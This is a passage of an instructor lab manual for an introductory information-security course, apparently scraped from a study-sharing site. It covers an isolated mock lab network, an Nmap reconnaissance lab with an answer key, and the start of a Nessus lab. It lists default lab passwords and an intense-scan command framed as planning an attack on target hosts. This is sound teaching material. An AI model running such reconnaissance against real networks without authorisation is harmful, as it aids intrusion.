LabManualITT255
235 Pages

LabManualITT255

Course Number: IT 255, Spring 2013

College/University: ITT Tech Flint

Word Count: 32064

Rating:

Document Preview

Itt 255 IT255 Instructor Lab Manual LABORATORY Instructor Lab Manual IT255 Fundamentals of Information Systems Security Copyright 2012 Jones & Bartlett Learning, LLC www.jblearning.com All Rights Reserved. Current Version Date: 12/06/2010 -1- IT255 Instructor Lab Manual LABORATORY ISS Curriculum...

Unformatted Document Excerpt
Coursehero >> Michigan >> ITT Tech Flint >> IT 255

Course Hero has millions of student submitted documents similar to the one
below including study guides, practice problems, reference materials, practice exams, textbook help and tutor support.

Course Hero has millions of student submitted documents similar to the one below including study guides, practice problems, reference materials, practice exams, textbook help and tutor support.

255 IT255 Itt Instructor Lab Manual LABORATORY Instructor Lab Manual IT255 Fundamentals of Information Systems Security Copyright 2012 Jones & Bartlett Learning, LLC www.jblearning.com All Rights Reserved. Current Version Date: 12/06/2010 -1- IT255 Instructor Lab Manual LABORATORY ISS Curriculum Overview............................................................................................................................. 5 Ethics and Code of Conduct.......................................................................................................................... 6 ISS Mock IT Infrastructure ........................................................................................................................... 7 Laboratory #1 .............................................................................................................................................. 11 Lab #1: Perform Reconnaissance & Probing Using ZenMap GUI (Nmap) ........................................... 11 Learning Objectives and Outcomes........................................................................................................ 11 Required Setup and Tools....................................................................................................................... 11 Recommended Procedures...................................................................................................................... 14 Deliverables ...................................................................................................................................... ...... 18 Evaluation Criteria and Rubrics.............................................................................................................. 18 Lab #1 Assessment Worksheet ............................................................................................................ 19 Laboratory #2 .............................................................................................................................................. 22 Lab #2: Perform a Vulnerability Assessment Scan Using Nessus ....................................................... 22 Learning Objectives and Outcomes........................................................................................................ 22 Required Setup and Tools....................................................................................................................... 22 Recommended Procedures...................................................................................................................... 25 Deliverables ...................................................................................................................................... ...... 38 Evaluation Criteria and Rubrics.............................................................................................................. 38 Lab #2 Assessment Worksheet ............................................................................................................ 40 Laboratory #3 .............................................................................................................................................. 43 Lab #3: Enable Windows Active Directory and User Access Controls ................................................. 43 Learning Objectives and Outcomes........................................................................................................ 43 Required Setup and Tools....................................................................................................................... 43 Recommended Procedures...................................................................................................................... 44 Deliverables ...................................................................................................................................... ...... 48 Evaluation Criteria and Rubrics.............................................................................................................. 48 Lab #3 Assessment Worksheet ............................................................................................................ 49 Laboratory #4 .............................................................................................................................................. 52 Lab #4: Configure Group Policy Objects and Microsoft Baseline Security Analyzer (MBSA)............ 52 Learning Objectives and Outcomes........................................................................................................ 52 Required Setup and Tools....................................................................................................................... 52 Recommended Procedures...................................................................................................................... 53 Deliverables ...................................................................................................................................... ...... 57 Copyright 2012 Jones & Bartlett Learning, LLC www.jblearning.com All Rights Reserved. Current Version Date: 12/06/2010 -2- IT255 Instructor Lab Manual LABORATORY Evaluation Criteria and Rubrics.............................................................................................................. 58 Lab #4 Assessment Worksheet ............................................................................................................ 59 Laboratory #5 .............................................................................................................................................. 61 Lab #5: Perform Protocol Capture & Analysis Using Wireshark & Netwitness Investigator ............... 61 Learning Objectives and Outcomes........................................................................................................ 61 Required Setup and Tools....................................................................................................................... 61 Recommended Procedures...................................................................................................................... 63 Deliverables ...................................................................................................................................... ...... 70 Evaluation Criteria and Rubrics.............................................................................................................. 70 Lab #5 Assessment Worksheet ............................................................................................................ 71 Laboratory #6 .............................................................................................................................................. 73 Lab #6: Perform Business Continuity Plan Implementation Planning ................................................... 73 Learning Objectives and Outcomes........................................................................................................ 73 Required Setup and Tools....................................................................................................................... 73 Recommended Procedures...................................................................................................................... 73 Deliverables ...................................................................................................................................... ...... 77 Evaluation Criteria and Rubrics.............................................................................................................. 77 Lab #6 Business Recovery Strategy Assessment Spreadsheet ............................................................ 79 Lab #6 Assessment Worksheet ............................................................................................................ 80 Laboratory #7 .............................................................................................................................................. 84 Lab #7: Relate Windows Encryption and Hashing to Confidentiality & Integrity ................................ 84 Learning Objectives and Outcomes........................................................................................................ 84 Required Setup and Tools....................................................................................................................... 84 Recommended Procedures...................................................................................................................... 85 Deliverables ...................................................................................................................................... ...... 90 Evaluation Criteria and Rubrics.............................................................................................................. 90 Lab #7 Assessment Worksheet ............................................................................................................ 91 Laboratory #8 .............................................................................................................................................. 93 Lab #8: Perform a Website & Database Attack by Exploiting Identified Vulnerabilities ..................... 93 Learning Objectives and Outcomes........................................................................................................ 93 Required Setup and Tools....................................................................................................................... 93 Recommended Procedures...................................................................................................................... 94 Deliverables ...................................................................................................................................... .... 101 Evaluation Criteria and Rubrics............................................................................................................ 101 Lab #8 Assignment Worksheet.......................................................................................................... 103 Lab #8 Assessment Worksheet .......................................................................................................... 104 Copyright 2012 Jones & Bartlett Learning, LLC www.jblearning.com All Rights Reserved. Current Version Date: 12/06/2010 -3- IT255 Instructor Lab Manual LABORATORY Laboratory #9 ............................................................................................................................................ 107 Lab #9: Perform a Virus Scan and Malware Identification Scan and Eliminate Threats..................... 107 Learning Objectives and Outcomes...................................................................................................... 107 Required Setup and Tools..................................................................................................................... 107 Recommended Procedures.................................................................................................................... 108 Deliverables ...................................................................................................................................... .... 112 Evaluation Criteria and Rubrics............................................................................................................ 112 Lab #9 Assessment Worksheet .......................................................................................................... 113 Laboratory #10 .......................................................................................................................................... 116 Lab #10: Craft an Information Systems Security Policy ...................................................................... 116 Learning Objectives and Outcomes...................................................................................................... 116 Required Setup and Tools..................................................................................................................... 116 Recommended Procedures.................................................................................................................... 116 Deliverables ...................................................................................................................................... .... 121 Evaluation Criteria and Rubrics............................................................................................................ 121 Lab #10 Assessment Worksheet ........................................................................................................ 122 Copyright 2012 Jones & Bartlett Learning, LLC www.jblearning.com All Rights Reserved. Current Version Date: 12/06/2010 -4- IT255 Instructor Lab Manual LABORATORY ISS Curriculum Overview The Bachelor of Science degree in Information Systems Security (ISS) is comprised of twelve foundational courses, each of which has 10 labs. The students will perform paper-based labs (design, configuration, or analysis) and hands-on labs using real equipment, security tools, and applications. The ISS curriculum is comprised of the following courses: The introductory level courses, identified in red above, have paper-based labs with some accompanying hands-on labs. The security practitioner courses, in green above, have substantial, hands-on lab exercises requiring students to be proficient with hardware, software, tools, and applications commonly found within the seven domains of a typical IT infrastructure. The IS427 Capstone Project course is the final course that the ISS student takes prior to graduating from the program. This course encompasses all the accumulated knowledge obtained from the entire ISS curriculum and requires the student to respond to an RFP for information systems security consulting. Copyright 2012 Jones & Bartlett Learning, LLC www.jblearning.com All Rights Reserved. Current Version Date: 12/06/2010 -5- IT255 Instructor Lab Manual LABORATORY Ethics and Code of Conduct Students enrolled in the ISS curriculum are aware that the hardware, software, tools, and applications presented and used within the ISS curriculum are for instructional and educational purposes only. The students are not to use these tools, applications, or techniques on live production IT infrastructures. Under no circumstances shall they use the tools, applications, or techniques on ITT Technical Institute or the production IT infrastructures and networks of other organizations. Students enrolled in the ISS curriculum are required to conform to ITTs Code of Conduct described in the student manual as well as the institutions general and specific policies. Copyright 2012 Jones & Bartlett Learning, LLC www.jblearning.com All Rights Reserved. Current Version Date: 12/06/2010 -6- IT255 Instructor Lab Manual LABORATORY ISS Mock IT Infrastructure The ISS Mock IT infrastructure was designed to mimic a real-world IT infrastructure consisting of the seven domains of a typical IT infrastructure. Figure IN1 Seven Domains of Information Systems Security Responsibility The ISS Mock IT infrastructure consists of the following three major components: Cisco Core Backbone Network VM Server Farm VM Instructor and Student Workstations At the core of the ISS Mock IT infrastructure is a Cisco core backbone network using the CNS curriculum equipment (Cisco 2811/2801 routers, ASA5505s, and Catalyst 2950/2960 switches). The use of the Cisco core backbone network for both CNS and ISS provides a real-world representation of a typical IT infrastructure. This also requires proper preparation and loading of IOS image files and configuration files into/from the Cisco router and a TFTP server. Some ISS courses and labs require the use of the Cisco core backbone network when an IP network infrastructure is needed as part of the hands-on lab activity. This will be indicated in the Required Setup & Tools section of each laboratory within each ISS course lab manual. Onsite students will perform hands-on labs using this Cisco core backbone network and the VM server farm and VM workstations. Online students will watch video-only labs when the Cisco core backbone network is used and will perform hands-on labs using the VM server farm and VM workstations. Copyright 2012 Jones & Bartlett Learning, LLC www.jblearning.com All Rights Reserved. Current Version Date: 12/06/2010 -7- IT255 Instructor Lab Manual LABORATORY Figure 1 ISS Mock IT Infrastructure The second component is the virtualized server farm. This virtualized (VM) server farm (A) consists of Microsoft Windows and Ubuntu Linux servers running native, as well as, open source and freeware applications and services. The purpose of the VM server farm is to mimic production services and applications where the instructor has full control over the implementation of the VM server farm based on what the lab requires. Future ISS courses will have new VMs containing pertinent applications and tools. Note that the VM Server farm can connect to either ASA_Instructor or ASA_Student as long as the DHCP host range and IP default gateway router definitions are set properly. See Figure IN2 below. The third component is the Instructor (B) VM workstation and Student VM workstations (C) with client applications and tools pre-installed. See Figure IN2 below. The following notes are implementation recommendations: Install the VM server farm (A) and VM workstations (B and C) on either ASA_Instructor or ASA_Student as long as you specify the correct IP network lease address pool on the DHCP server and specify the correct IP default gateway router definition The DHCP server, WindowsDHCP01 is already pre-configured to support the 172.30.0.0, 255.255.255.0 / ASA_Instructor subnet with an IP default gateway router of 172.30.0.1, 255.255.255.0 Install the VM server farm on a dedicated classroom workstation with 2 Gig RAM (required) / 4 Gig RAM (recommended) Copyright 2012 Jones & Bartlett Learning, LLC www.jblearning.com All Rights Reserved. Current Version Date: 12/06/2010 -8- IT255 Instructor Lab Manual LABORATORY Figure IN2 VM Server Farm and VM Workstations To support the delivery of the ISS curriculum, the ITT Technical Institutes Microsoft software licenses are used where needed for Microsoft server and workstation VMs. The VM server farm is physically housed on a USB hard drive allowing for the physical installation to a dedicated VM server farm workstation. All student workstations must be physically isolated from the rest of the classroom workstations because some ISS courses and hands-on labs require disconnection from the ITT internal network. The ISS hands-on labs require the instructor or student to install their hard drive into a physical workstation in the classroom. VMware Player v3.x is used to enable the VM servers and/or VM workstations. Use of a DHCP server provides all IP host addresses to the VM workstations. Ideally, the VM server farm workstation should have 4 Gig of RAM in order to load and run more than 2 VM servers. The Instructor and Student VM workstations can have 2 Gig RAM to load to VM workstation with applications and tools. Figure 1 shows a high-level diagram of the Mock IT Infrastructure representing both the network and server elements. Do not connect the Mock IT infrastructure to the internal ITT Technical Institute network or public Internet. Special partitioning and separation of those classroom workstations used for ISS hands-on labs is required because the intrusive applications and tools are used by ISS handson labs. The VM server farm should be connected to the layer 2 switch along with the Instructor VM and Student VM workstations. From here you can run an RJ45-RJ45 trunk cable connecting the layer 2 switch to ASA_Instructor (this is the default configuration using 172.30.0.0/24). This way the VM server farm and DHCP server can be accessed by either the Instructor or Student VM workstations. The default DHCP setting are: 172.30.0.0/24 (IP Network Number with 255.255.255.0 Subnet Mask) 172.30.0.1 /25 (IP Default Gateway Router) 172.30.0.55 172.30.0.199 (DHCP Address Lease Pool) Note: It is recommended that you isolate the necessary classroom workstations on their own layer 2 switch, and then connect the VM server farm and Instructor VM to this same layer 2 switch. This will Copyright 2012 Jones & Bartlett Learning, LLC www.jblearning.com All Rights Reserved. Current Version Date: 12/06/2010 -9- IT255 Instructor Lab Manual LABORATORY facilitate fast and easy connectivity to ASA_Instructor via an RJ45 patch cable/trunk cable. This is shown in Figure 1 previously. Note: The latest version of the ISS Mock IT Infrastructure Installation & Setup Guide (in PDF format) can be found in two different locations: (ISS Mock IT Infrastructure_v 3 7_101006_dk final.pdf) The www.jblearning.com\ITT instructor portal: The ISS Mock IT Infrastructure Installation and Setup Guide can be found in each courses \Labs sub-folder as follows: \ISxxx\Labs\Mock IT Infrastructure\..., where xxx=ISS Course Number The ITT Faculty Portal: The Mock IT Infrastructure Installation and Setup Guide and can be found here: \ITT Faculty Portal\IT Shared Documents\ISS\Mock Infrastructure Setup v3.7\... Copyright 2012 Jones & Bartlett Learning, LLC www.jblearning.com All Rights Reserved. Current Version Date: 12/06/2010 -10- IT255 Instructor Lab Manual LABORATORY Laboratory #1 Lab #1: Perform Reconnaissance & Probing Using ZenMap GUI (Nmap) Learning Objectives and Outcomes Upon completing this lab, students will be able to perform the following tasks: Obtain, access, and copy the Virtual Machines (server farm and workstations) needed for IT255 onto your removable hard drive Use VMware Player to enable and power-up the VMs (server farm and workstations) needed for this hands-on lab Plan an initial reconnaissance and probing attack on the ISS Mock IT Infrastructure Use ZenMap GUI (Nmap) to perform an Intense Scan on the entire targeted ISS Mock IT Infrastructure 172.30.0.0/24 Generate a ZenMap GUI (Nmap) port scanning report and submit as part of your hands-on lab deliverables Required Setup and Tools This lab requires the use of the ITT Mock IT Infrastructure and Virtualized Server Farm. Figure 1 ISS Onsite Mock IT Infrastructure & Virtualized Server Farm Copyright 2012 Jones & Bartlett Learning, LLC www.jblearning.com All Rights Reserved. Current Version Date: 12/06/2010 -11- IT255 Instructor Lab Manual LABORATORY The Mock IT Infrastructure is a preconfigured IP network infrastructure complete with a classroom Cisco WAN and a virtualized server farm. All IP-addressing schema, VLAN configurations, and layer 2/3 switching is pre-configured. The IP networking infrastructure remains static and only needs the following removable parts: A) A classroom workstation (with at least 2 Gig RAM/4 Gig RAM recommended) capable of supporting a removable hard drive containing the virtualized server farm. This classroom workstation will support the virtualized server farm and connects to the same layer 2 switch as the Instructor and Student VM workstations. This layer 2 switch is then connected to ASA_Instructor for entry into the IP networking infrastructure via an RJ45 trunk cable (refer to Figure 1) using 172.30.0.1 255.255.255.0 as the IP default gateway router B) An instructor workstation (with at least 2 Gig RAM) that shall act as the instructors demo VM workstation. He/she will display the Instructor VM workstation on the LCD projector to demonstrate enabling and powering the VM server farm and VM workstation and for performing the hands-on lab C) The student classroom workstations isolated on a layer 2 switch for connectivity to the ISS Mock IT Infrastructure via a trunk cable to ASA_Instructor. These workstations will support the Student VM workstation and Target VM servers locally The following summarizes the setup, configuration, and equipment needed to perform Lab #1: 1. Standard ISS Mock IT infrastructure and virtualized server farm configuration and setup which consist of the following components: a. Cisco 2801 routers, 2960 catalyst LAN switches, and ASA 5505 firewalls with OSPF core and VLANs 2. A Virtualized Server Farm with the following components: a. Microsoft DHCP server for allocating student IP host addresses b. A Student and/or Instructor VM workstation 3. Target VMs as described by the lab: a. Windows 2003 Server Standard Edition Windows Server 2003 Standard Edition 32-bit (VM Name: TargetWindows01) o Computer Name: Windows02 o Three Users Available: administrator, instructor or student (case sensitive) o Password: ISS316Security o IP Address: DHCP o Domain Login: NO Copyright 2012 Jones & Bartlett Learning, LLC www.jblearning.com All Rights Reserved. Current Version Date: 12/06/2010 -12- IT255 Instructor Lab Manual LABORATORY FTP (Filezilla FTP Server) o Port: 21 o Username: instructor or student o Password: TFTP (Tftpd32 TFTP Server) o Port: 69 o Username: o Password: b. Ubuntu Desktop 9.10 Linux Ubuntu Linux 9.10 Desktop Edition (VM Name: TargetUbuntu02) o Computer Name: Ubuntu02 o Two Users Available: instructor or student o Password: ISS316Security (case sensitive) o IP Address: DHCP c. Ubuntu Server 10.04 Linux Target Ubuntu Linux 10.04 LTS Server (VM Name: TargetUbuntu01) o Computer Name: Ubuntu01 o ONE User available ONLY: administrator o Password: ISS316Security (case sensitive) o IP Address: eth0 set to DHCP, eth1 and eth2 not set. SSH o Port: 21 o Username: administrator o Password: Apache running Damn Vulnerable Web App (DVWA) o URL: http:///dvwa o Password: password o Username: admin 4. Security and CLI tools 5. Standard ITT onsite student workstation must have the following software applications loaded to perform this lab: a. VMware Player 3.x b. Microsoft Office 2007 or higher for Lab Assessment Questions & Answers Copyright 2012 Jones & Bartlett Learning, LLC www.jblearning.com All Rights Reserved. Current Version Date: 12/06/2010 -13- IT255 Instructor Lab Manual LABORATORY Recommended Procedures Instructor Demo Lab#1: The instructor will load VMware Player and demonstrate how to add and remove VMs from the VMware Library as well as how to copy and backup the necessary VMware files. The instructor will also give the students a tour of the VM servers and the pre-loaded applications and tools on the student VM workstations. Finally, the instructor will demonstrate how to run a ZenMap GUI (Nmap) Intense Scan on the local 172.30.0.0/24 subnet performing the following: IP Discovery IP Hosts Summary Ports and Services Available on Hosts Complete IP Subnet Intense Scan The instructor will review the results of the Intense Scan with the class displaying the results on the overhead projector for questions from the class. Hands-on Lab #1 Instructor Steps: The Instructor will perform the following demonstration: 1. Connect the instructor removable hard drive to your workstation 2. Boot up the Instructor VM and Microsoft DHCP VM server to allocate an IP host address 3. Enable your DOS command prompt and type ipconfig and ping your allocated IP host address 172.30.0.__ , the DHCP server 172.30.0.10, and the IP default gateway router 172.30.0.1 4. Connect your instructor workstation to the LCD projector and show the VMware Player library and how to add, remove and copy VMs to and from the library and the local computer 5. Login into the Instructor VM and if you are working with a 4GB RAM workstation start the three Target VMs: Windows01, Ubuntu01 and Ubuntu02. Login ID: instructor or student (case sensitive) Password: ISS316Security (case sensitive) NOTE: If the workstations in your physical classroom have only 2GB of RAM then only two VMs can be powered-on at once. You have to split the VM server farm into 2 physical workstations, loading 2 VM servers in each (WindowsDHCP01 and TargetWindows01) and (TargetUbuntu01 and TargetUbuntu02) to maximize performance. Copyright 2012 Jones & Bartlett Learning, LLC www.jblearning.com All Rights Reserved. Current Version Date: 12/06/2010 -14- IT255 Instructor Lab Manual LABORATORY Figure 2 VMware Player with Virtualized Server Farm 6. The Instructor VM is just like the Student VM in regards to what applications are loaded, give the students a tour of each of the applications loaded: a. PuTTY for Telnet and SSH b. Filezilla for FTP c. tftpd32 for TFTP d. Wireshark for packet capture and protocol analysis e. Netwitness Investigator for packet importing and protocol analysis f. Nessus - for vulnerability assessment scanning g. ZenMap GUI for IP discovery, port and services scanning 7. Engage the DOS command prompt on the Instructor VM and PING various IP hosts and the default gateway which is the ASA_Instructor 172.30.0.1 8. Run the PuTTY application from the Instructor VM and TELNET or SSH to the ASA_Instructor (172.30.0.1), LAN.SW1 (172.16.8.5), LAN.SW2 (172.20.8.5), WestCovina (172.20.8.1), and Norfolk (172.16.8.1) routers Copyright 2012 Jones & Bartlett Learning, LLC www.jblearning.com All Rights Reserved. Current Version Date: 12/06/2010 -15- IT255 Instructor Lab Manual LABORATORY 9. When you connect to a Cisco switch or router, enter the user name of cisco and terminal console password of cisco and then type show ip route and show run to display the Cisco core backbone networks configuration 10. Log into the WindowsTarget01 VM server, and show the class the pre-loaded applications and tools that will be used in this course 11. Log into the TargetUbuntu01 Linux server and TargetUbuntu02 Linux desktop, and show the students the server and workstation 12. From the Instructor VM desktop, enable ZenMap GUI and load the Nmap application 13. Perform a Ping Scan or Quick Scan on 172.30.0.0/24 to identify all the hosts on the local subnetwork 14. Perform an Intense Scan on 172.30.0.0/24, and capture the results in the Nmap report 15. Review the results with the class on the overhead projector, and answer any questions Hands-on Lab #1 Student Steps: This lab will introduce the students to applications and tools commonly used by hackers and information systems security practitioners. Ethical hacking, penetration testing, and security assessments will be discussed as they learn how to perform reconnaissance and probing tasks. For this lab, the students will perform the following steps: 1. Connect the student removable hard drive to your workstation 2. Boot up the Student VM, and obtain an IP address from the DHCPWindows01 VM server connected to the same layer 2 switch as your student VM workstation 3. Enable your DOS command prompt and type ipconfig and ping your allocated IP host address 172.30.0.__ , the DHCP server 172.30.0.10, and the IP default gateway router 172.30.0.1 NOTE: If the workstations in your physical classroom have only 2GB of RAM then only two VMs can be powered-on at once. You only need to power-on your Student VM workstation since the DHCP server is part of the VM server farm. Copyright 2012 Jones & Bartlett Learning, LLC www.jblearning.com All Rights Reserved. Current Version Date: 12/06/2010 -16- IT255 Instructor Lab Manual LABORATORY Figure 2 VMware Player with Virtualized Server Farm 4. The Student VM workstation has the following pre-loaded applications and tools which will be used throughout this course and other ISS curriculum courses: a. PuTTY for Telnet and SSH b. Filezilla for FTP c. tftpd32 for TFTP d. Wireshark for packet capture and protocol analysis e. Netwitness Investigator for packet importing and protocol analysis f. Nessus - for vulnerability assessment scanning g. ZenMap GUI for IP discovery, port and services scanning 5. Enable your DOS command prompt and type ipconfig and ping your allocated IP host address 172.30.0.__ , the DHCP server 172.30.0.10, and the IP default gateway router 172.30.0.1 6. Run the PuTTY application from the Instructor VM and TELNET or SSH to the ASA_Instructor (172.30.0.1), LAN.SW1 (172.16.8.5), LAN.SW2 (172.20.8.5), WestCovina (172.20.8.1), and Norfolk (172.16.8.1) routers Copyright 2012 Jones & Bartlett Learning, LLC www.jblearning.com All Rights Reserved. Current Version Date: 12/06/2010 -17- IT255 Instructor Lab Manual LABORATORY 7. When you connect to a Cisco switch or router, enter the user name of cisco and terminal console password of cisco. Then type show ip route and show run to display the Cisco core backbone networks configuration 8. From the Student VM desktop, enable ZenMap GUI, and load the Nmap application 9. Perform a Ping Scan or Quick Scan on 172.30.0.0/24 to identify all the hosts on the local subnetwork 10. Perform an Intense Scan on 172.30.0.0/24, and capture the results in the Nmap report 11. Save the results of your Intense Scan, and submit them as part of your lab deliverables Deliverables Upon completion of this lab, the students are required to submit the following deliverables as part of this lab: 1. Lab #1 Softcopy of the ZenMap GUI Intense Scan report performed 2. Lab #1 Assessment Questions & Answers Evaluation Criteria and Rubrics The following are the evaluation criteria and rubrics for Lab #1 that the students must perform: 1. Was the student able to obtain, access and copy the Virtual Machines (server farm and workstations) needed for IT255 onto your removable hard drive? [20%] 2. Was the student able to use VMware Player to enable and power-up the VMs (server farm and workstations) needed for this hands-on lab? [20%] 3. Was the student able to plan an initial reconnaissance and probing attack on the ISS Mock IT Infrastructure? [20%] 4. Was the student able to use ZenMap GUI (Nmap) to perform an Intense Scan on the entire targeted ISS Mock IT Infrastructure 172.30.0.0/24? [20%] 5. Was the student able to generate a ZenMap GUI (Nmap) port scanning report and submit as part of your hands-on lab deliverables? [20%] Copyright 2012 Jones & Bartlett Learning, LLC www.jblearning.com All Rights Reserved. Current Version Date: 12/06/2010 -18- IT255 Instructor Lab Manual LABORATORY Lab #1 Assessment Worksheet Perform Reconnaissance & Probing Using ZenMap GUI (Nmap) Course Name & Number: ______________________________________________________________ Student Name: _______________________________________________________________________ Instructor Name: _____________________________________________________________________ Lab Due Date: _______________________________________________________________________ Overview Hackers traditionally follow a 5-step approach to seek out and destroy targeted hosts. The first step in performing an attack is to plan the attack by identifying your target and learning as much as possible about the target. Hackers traditionally perform an initial reconnaissance & probing scan to identify IP hosts, open ports, and services enabled on servers and workstations. In this lab, students will plan an attack on 172.30.0.0/24 where the VM server farm resides. Using ZenMap GUI, students will then perform a Ping Scan or Quick Scan on the targeted IP subnetwork. Lab Assessment Questions & Answers 1. Name at least five applications and tools pre-loaded on the Windows 2003 Server Target VM (VM Name: WindowsTarget01) and identify whether that application starts as a service on the system or must be run manually? Windows Applications Loaded 1. Splunk 2. Putty 3. Nessus 4. tftpd32 5. Filezilla FTP 6. There are others Starts as Service Y/N Y N Y Y Y Y/N 2. What was the DHCP allocated source IP host address for the Student VM, DHCP Server, and IP default gateway router? At the DOS Command Prompt, type ipconfig to display the IP address of your Student VM workstation. After you ping other devices, you can display the ARP cache in your Student VM workstation by typing arp a to obtain the answer to this question. Copyright 2012 Jones & Bartlett Learning, LLC www.jblearning.com All Rights Reserved. Current Version Date: 12/06/2010 -19- IT255 Instructor Lab Manual LABORATORY 3. Did the targeted IP hosts respond to the ICMP echo-request packet with an ICMP echo-reply packet when you initiated the ping command at your DOS prompt? If yes, how many ICMP echorequest packets were sent back to the IP source? Four (4) 4. If you ping the WindowsTarget01 VM server and the UbuntuTarget01 VM server, which fields in the ICMP echo-request / echo-replies vary? At least one: TTL (Time to Live). Windows Servers have a TTL of 128 and Ubuntu Linux Servers use a TTL of 64. 5. What is the command line syntax for running an Intense Scan with ZenMap on a target subnet of 172.30.0.0/24? nmap -T4 -A -v -PE -PS22,25,80 -PA21,23,80,3389 172.30.0.0/24 6. Name at least 5 different scans that may be performed from the ZenMap GUI and document under what circumstances you would choose to run those particular scans. a. Intense Scan A thorough scan of all well-known TCP ports and Services identifying wellknown services such as FTP, HTTP, etc b. Intense Scan plus UDP Same as Intense Scan but scans the well-known port numbers using the UDP protocol as well as TCP, which detects services such as tftp, DNS, etc c. Intense Scan All TCP Ports This scan will detect all running TCP services on all available ports 0-65535, this is chosen when you want the scan to detect running services on high ports d. Ping Scan A very quick scan that is designed to simply ping all addresses on a given network identifying which hosts are alive and responding to pings e. Slow Comprehensive Scan A thorough scan that is designed to bypass IDS systems and not set off any alarms due to how slow it scans, more time-consuming but much more stealthy 7. How many different tests (i.e., scripts) did your Intense Scan definition perform? List them all after reviewing the scan report. 36. Students are required to submit a softcopy of the Intense Scan results. Copyright 2012 Jones & Bartlett Learning, LLC www.jblearning.com All Rights Reserved. Current Version Date: 12/06/2010 -20- IT255 Instructor Lab Manual LABORATORY 8. Describe what each of these tests or scripts performs within the ZenMap GUI (Nmap) scan report. ARP Ping Scan ping scan to identify active IP hosts SYN Stealth Scan equivalent of an open port scan on active IP hosts OS Detection Scan operating system fingerprint scan to identify the OS of the server or workstation Service Scan services scan for enabled applications and services on identifies servers and workstations 9. How many total IP hosts (not counting Cisco device interfaces) did ZenMap GUI (Nmap) find on the network? You should have captured all the Student VM workstations and the Instructor VM workstation on the layer 2 switch plus the 4 VM servers 10. Based on your Nmap scan results and initial reconnaissance & probing, what next steps would you perform on the VM server farm and VM workstation targets? Using the IP hosts, open ports, and services/applications identified, a vulnerability assessment scan would be the next step in an effort to identify software vulnerabilities and exploits in targeted services and workstations. Copyright 2012 Jones & Bartlett Learning, LLC www.jblearning.com All Rights Reserved. Current Version Date: 12/06/2010 -21- IT255 Instructor Lab Manual LABORATORY Laboratory #2 Lab #2: Perform a Vulnerability Assessment Scan Using Nessus (Nessus is a Registered Trademark of Tenable Network Security, Inc.) Learning Objectives and Outcomes Upon completing this lab, students will be able to complete the following tasks: Identify risks, threats, and vulnerabilities in an IP network infrastructure using ZenMap GUI (Nmap) to perform an IP host, port, and services scan Perform a vulnerability assessment scan on a targeted IP subnetwork using Nessus Compare the results of the ZenMap GUI Intense Scan with a Nessus vulnerability assessment scan Assess the findings of the vulnerability assessment scan and identify critical vulnerabilities Make recommendations for mitigating the identified risks, threats, and vulnerabilities as described on the CVE database listing Required Setup and Tools This lab requires the use of the ISS Mock IT Infrastructure and Virtualized Server Farm. Figure 1 ISS Onsite Mock IT Infrastructure & Virtualized Server Farm Copyright 2012 Jones & Bartlett Learning, LLC www.jblearning.com All Rights Reserved. Current Version Date: 12/06/2010 -22- IT255 Instructor Lab Manual LABORATORY The Mock IT Infrastructure and Virtualized Server Farm is a preconfigured IP network infrastructure complete with a classroom Cisco WAN and a virtualized server farm. All IP addressing schema, VLAN configurations, and layer 3 switching is preconfigured. The IP networking infrastructure remains static and only needs the following removable parts: A) A classroom workstation (with at least 4 Gig RAM) capable of supporting an insert-able hard drive or USB hard drive with a pre-configured, virtualized server farm. This classroom workstation/server will support the virtualized server farm connected to the ASA_Instructor VLAN B) An instructor workstation (with at least 2 Gig RAM) that shall act as the instructors demonstration LAB workstation. The instructor will display the instructor workstation on the LCD projector to demonstrate the loading and configuring of the ISS Mock IT Infrastructure and Server Farm with VMware Player C) Students LAB workstations will use a local copy of the ISS Mock IT Infrastructure Server Farm on a local or USB hard drive with VMware Player to run their Student and Target VMs The following summarizes the setup, configuration, and equipment needed to perform Lab #2: 1. Standard ITT Mock IT Infrastructure and Virtualized Server Farm configuration and setup a. Cisco 2801 routers, 2960 catalyst LAN switches, and ASA 5505 firewalls with OSPF core and VLANs 2. A Virtualized Server Farm with: a. Microsoft DHCP server for allocating student IP host addresses b. A Student and/or Instructor VM workstation 3. Target VMs as described by the Lab: a. Student or Instructor VM with Nessus and ZenMap installed b. Windows 2003 Server Target c. Ubuntu Desktop 9.10 Linux Target d. Ubuntu Server 10.04 Linux Target 4. Standard ITT onsite student workstation must have the following software applications loaded to perform this lab: a. VMware Player 3.x b. Microsoft Office 2007 or higher for Lab Assessment Questions & Answers Copyright 2012 Jones & Bartlett Learning, LLC www.jblearning.com All Rights Reserved. Current Version Date: 12/06/2010 -23- IT255 Instructor Lab Manual LABORATORY Nessus v4.2.2 Vulnerability Assessment & Scanning Software Training: Nessus and Network Scanning Curriculums If your information security teaching/training organization uses Nessus in your curriculum to teach students how to scan for network vulnerabilities, the Tenable license allows you to use the HomeFeed subscription for your training purposes and may be found in Tenables HomeFeed and ProfessionalFeed Subscription Agreement. Program Rights, Requirements and Limitations: You are permitted to copy/build images and redistribute Tenables Nessus and Tenable HomeFeed Plugins to students in/for the classroom setting only. Upon completion of the class, the ability to use the Plugins provided by the HomeFeed is terminated, and the students must re-register for either a HomeFeed or a ProfessionalFeed according to their intended use as is governed by the Subscription Agreement. Information security organizations and the students are not permitted to use the HomeFeed in a commercial fashion to secure their organizations or a third party networks. It is only to be used for demonstration and teaching purposes in structured class environment. If you qualify for the right to use a Tenable subscription for your teaching/training organization, you are required to review the license agreement in its entirety. You will have the authorization to use the Nessus logo in your presentation of the class(es). If you choose to use the Nessus logo, it must always be accompanied by the following: Nessus is a Registered Trademark of Tenable Network Security, Inc. Tenable reserves the right to revoke a free subscription or terminate a subscription at its sole discretion at any time. Nessus Overview Nessus performs remote scans and audits of Unix, Windows, and network infrastructures. Nessus can perform a network discovery of devices, operating systems, applications, databases, and services running on those devices. Any non-compliant hosts running applications such as peer-to-peer, spyware or malware (worms, Trojans, etc.) are detected and identified. Nessus is capable of scanning all ports on every device and issuing remediation strategy suggestions as required. Copyright 2012 Jones & Bartlett Learning, LLC www.jblearning.com All Rights Reserved. Current Version Date: 12/06/2010 -24- IT255 Instructor Lab Manual LABORATORY Nessus includes the ability to perform in-depth web application audits that identify vulnerabilities in custom built applications. Custom web applications can have their operating system, application, and SQL database audited and hardened against a variety of industry best practices and recommendations. Recommended Procedures Instructor Demo Lab#2: The instructor will demonstrate performing an initial reconnaissance & probing scan of a targeted IP subnetwork containing the VM server farm using ZenMap GUI (Nmap) this was performed previously in Lab #1 but is repeated in Lab #2. From this initial scan, specific information about targeted VM servers can be obtained to perform a vulnerability assessment scan on the targeted server. The instructor will perform a vulnerability assessment 